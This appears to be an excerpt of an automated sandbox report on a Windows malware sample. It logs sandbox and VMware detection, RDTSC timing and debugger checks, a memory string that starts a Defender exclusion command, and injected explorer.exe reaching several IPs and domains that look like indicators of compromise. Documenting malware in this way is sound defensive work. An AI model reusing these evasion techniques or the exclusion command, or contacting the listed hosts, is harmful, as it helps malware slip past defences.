          Source: Yara matchFile source: Process Memory Space: 56460021473877.exe PID: 5240, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: 56460021473877.exe, 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Source: 56460021473877.exe, 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmpBinary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\56460021473877.exeRDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\56460021473877.exeRDTSC instruction interceptor: First address: 000000000040899E second address: 00000000004089A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 0000000002838604 second address: 000000000283860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\control.exeRDTSC instruction interceptor: First address: 000000000283899E second address: 00000000028389A4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\56460021473877.exe TID: 7164Thread sleep time: -40424s >= -30000s
          Source: C:\Users\user\Desktop\56460021473877.exe TID: 7144Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\explorer.exe TID: 5628Thread sleep time: -45000s >= -30000s
          Source: C:\Windows\SysWOW64\control.exe TID: 2228Thread sleep time: -40000s >= -30000s
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\control.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\56460021473877.exeThread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\56460021473877.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\56460021473877.exeThread delayed: delay time: 40424
          Source: C:\Users\user\Desktop\56460021473877.exeThread delayed: delay time: 922337203685477
          Source: 56460021473877.exe, 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmpBinary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
          Source: 56460021473877.exe, 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: explorer.exe, 00000004.00000000.708037990.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.713009382.000000000FCE0000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATA
          Source: 56460021473877.exe, 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: explorer.exe, 00000004.00000000.740013105.0000000006650000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.708037990.000000000A60E000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000004.00000000.743454584.000000000A716000.00000004.00000001.sdmpBinary or memory string: War&Prod_VMware_SATAa
          Source: explorer.exe, 00000004.00000000.727315050.000000000A897000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}//
          Source: explorer.exe, 00000004.00000000.719227439.0000000004710000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
          Source: explorer.exe, 00000004.00000000.743454584.000000000A716000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
          Source: explorer.exe, 00000004.00000000.743676965.000000000A782000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
          Source: 56460021473877.exe, 00000000.00000002.694839132.00000000023A1000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\56460021473877.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04712073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04721074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0467746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04670050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04670050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046EC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0466B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0466B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0466B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0466B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04724015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04724015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04711C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0472740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0472740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0472740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_047114FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04728CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046EB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046EB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046990AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04659080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0466849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0465C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0467C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0467C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0465B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0465B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0467B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0467B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04693D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04677D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04728D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04674120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04674120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04674120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04674120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04674120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04663D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04684D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04684D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04684D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0465AD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046DA537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04659100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04659100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04659100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04708DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0465B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0465B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0465B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046E41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0466D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0466D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046861A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046835A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04681DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04681DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04681DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0467C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04652D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04652D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04652D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04652D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04652D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0466766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0470B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0470B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04728A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0469927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0467AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0467AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0467AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0467AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0467AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04659240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04659240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04659240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04659240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04667E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04667E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04667E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04667E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04667E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04667E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046E4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0465E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0470FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0465C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0465C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0465C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04668A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04673A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046676E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046816E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04728ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046836CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04698EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0470FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046552A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0466AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0466AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04720EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04720EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04720EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046EFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0465DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0466FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04683B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04683B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04728F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0465DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0466EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04728B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0465F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04654F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04654F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0471131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0467F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046EFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0472070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0472070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046937F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04725BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04661B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04661B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0470D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_04668794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0468B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_046D7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\control.exeCode function: 8_2_0471138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\56460021473877.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\control.exeProcess queried: DebugPort
          Source: C:\Users\user\Desktop\56460021473877.exeCode function: 3_2_00409B40 LdrLoadDll,
          Source: C:\Users\user\Desktop\56460021473877.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 213.186.33.5 80
          Source: C:\Windows\explorer.exeNetwork Connect: 52.5.157.71 80
          Source: C:\Windows\explorer.exeNetwork Connect: 216.10.241.4 80
          Source: C:\Windows\explorer.exeDomain query: www.eastsidescooters.com
          Source: C:\Windows\explorer.exeNetwork Connect: 67.205.83.103 80
          Source: C:\Windows\explorer.exeDomain query: www.celltecstore.com
          Source: C:\Windows\explorer.exeDomain query: www.thecrystalconsciousness.com
          Source: C:\Windows\explorer.exeDomain query: www.ps-sac.com
          Source: C:\Windows\explorer.exeDomain query: www.ville-fogalmam.com
          Source: C:\Windows\explorer.exeDomain query: www.box-770.com
          Source: C:\Windows\explorer.exeDomain query: www.txsports.club
          Source: C:\Windows\explorer.exeDomain query: www.rajinderbeas.com
          Source: C:\Windows\explorer.exeNetwork Connect: 31.170.167.144 80
